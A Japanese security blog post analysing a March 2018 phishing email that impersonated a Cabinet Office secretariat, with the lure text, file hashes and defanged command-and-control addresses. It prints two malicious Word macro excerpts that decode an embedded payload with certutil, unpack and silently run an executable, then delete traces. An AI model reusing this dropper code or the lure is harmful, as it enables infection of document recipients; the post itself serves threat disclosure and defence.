ブログトップ 記事一覧 ログイン 無料ブログ開設

piyolog RSSフィード

2018-03-14

2018年3月の内閣府のなりすましメールについてまとめてみた

| 05:26 |  2018年3月の内閣府のなりすましメールについてまとめてみたを含むブックマーク

2018年3月12日頃、内閣府の総合海洋政策推進事務局になりすましたメールが確認されたとの参考情報を得ました。

ここではなりすましメールの関連情報をまとめます。

詐称メールの情報

詐称メールの情報を整理すると次の通りです。

確認された時期2018年3月12日(月)昼頃
差出人名無し(送信元アドレスそのまま表記)
送信元アドレス ******_0****@yahoo.co.jp
件名新旧参与会議意見書の比較
本文**先生

大変お世話になっております。
内閣府総合海洋政策推進事務局でございます。

新旧参与会議意見書の比較につき、情報共有いたします。
よろしくご査収願います。
**拝

--------------------
内閣府総合海洋政策推進事務局
参事官補佐
** *(**** ******)
MAIL: **************@cao.go.jp
TEL: 03-6257-****
--------------------
添付ファイル有り

添付ファイルの情報

ドキュメント上部の黄色のメッセージバーを注してください。

1.「編集を有効にする」をクリックします。

2.「コンテンツの有効化」をクリックします。

  • マクロを実行するとEXE形式のファイルが展開され、外部の通信先に接続します。
Private Sub Document_Close()
Dim ZaRmOsIFuGrHzCUw As Long
Dim HfNoBoTFzClPnIKu As String
HfNoBoTFzClPnIKu = Environ("temp") & "\UiHxUvNNtFiTaXZl"
ZaRmOsIFuGrHzCUw = ActiveDocument.Content.End
Set FzQcYhSAgUcYcNVu = ActiveDocument.Range(1, ZaRmOsIFuGrHzCUw)
Set LhEtKtONyFfQwSOp = CreateObject("Scripting.FileSystemObject")
Set JpKzRgIXpSnJuHNd = LhEtKtONyFfQwSOp.CreateTextFile(HfNoBoTFzClPnIKu, True)
JpKzRgIXpSnJuHNd.WriteLine (FzQcYhSAgUcYcNVu)
JpKzRgIXpSnJuHNd.Close
Set UwZhPzKHoBiMmRIb = CreateObject("Wscript.Shell")
UwZhPzKHoBiMmRIb.Run "cmd.exe /c certutil -decode %temp%\\UiHxUvNNtFiTaXZl %temp%\\ViLlOmGPlPmIhLHa", 0, True
UwZhPzKHoBiMmRIb.Run "cmd.exe /c expand %temp%\\ViLlOmGPlPmIhLHa -F:* %temp%\\", 0, True
UwZhPzKHoBiMmRIb.Run "cmd.exe /c %temp%\\VizorHtmlDialog.exe", 0, False
UwZhPzKHoBiMmRIb.Run "cmd.exe /c del %temp%\\UiHxUvNNtFiTaXZl", 0, False
UwZhPzKHoBiMmRIb.Run "cmd.exe /c del %temp%\\ViLlOmGPlPmIhLHa", 0, False
Set UwZhPzKHoBiMmRIb = Nothing
Set LhEtKtONyFfQwSOp = Nothing
End Sub

関連が疑われる情報

  • 作成されるファイル「vizorhtmldialog.exe」が同一ハッシュ値であるとして、別のファイル(世界経済アウトルック.doc)も確認しています。
  • このファイルは1月30日頃にVTへ初回アップロードされていました。
  • VTアップロード時のファイル名がMIMEエンコードされていたことから、同様にメールにてまかれていた可能性が考えられます。
  • ファイルを開くとOfficeの画像とともに次の文言が記述されており、開封者に保護モードの解除とマクロの実行が促されます。

【上部の黄色のメッセージ バーが表示された状態で】

「編集を有効にする」をクリックします。その後、「コンテンツの有効化」ボタンをクリックします。

  • マクロが実行されるとファイルが展開され外部へ接続します。接続先は別でした。
Set DGHjIKbFRghjH = jIHiuHY.CreateTextFile(HYFRTghYcU, True)
DGHjIKbFRghjH.WriteLine (crHJUgVD)
DGHjIKbFRghjH.Close
Set uVFTyuiVGT = CreateObject("Wscript.Shell")
uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True
uVFTyuiVGT.Run "cmd.exe /c expand %temp%\\IcfRyFiuHdeU -F:* %temp%\\", 0, True
uVFTyuiVGT.Run "cmd.exe /c %temp%\\VizorHtmlDialog.exe", 0, False
Set uVFTyuiVGT = Nothing
Set jIHiuHY = Nothing
End Sub

Private Sub Document_New()

End Sub

インディケーター情報

ファイル
ファイル名ハッシュ値
新旧参与会議意見書の比較.doc36fb6eb6c46a517391c722046c769a31283b784738f2b4ab62a4accb0528b0e0
世界経済アウトルック.doc5788b5a50cf8057f138a585221bb55498987a3510fe4e60b38aaa803bddbe1e9
通信
URLIPアドレス
samiratikhonova[.]camdvr[.]org185[.]80[.]53[.]206
friendlysupport[.]giize[.]com83[.]136[.]106[.]108
  • IPアドレス(83[.]136[.]106[.]108)を割り当てる別のURLも存在していますが、利用されているかまでは確認できませんでいた。
    • consistent[.]ddnsgeek[.]com
    • promise[.]dynu[.]net

更新履歴

  • 2018年3月15日 AM 新規作成
  • 2018年3月15日 AM メール差出人名の箇所を修正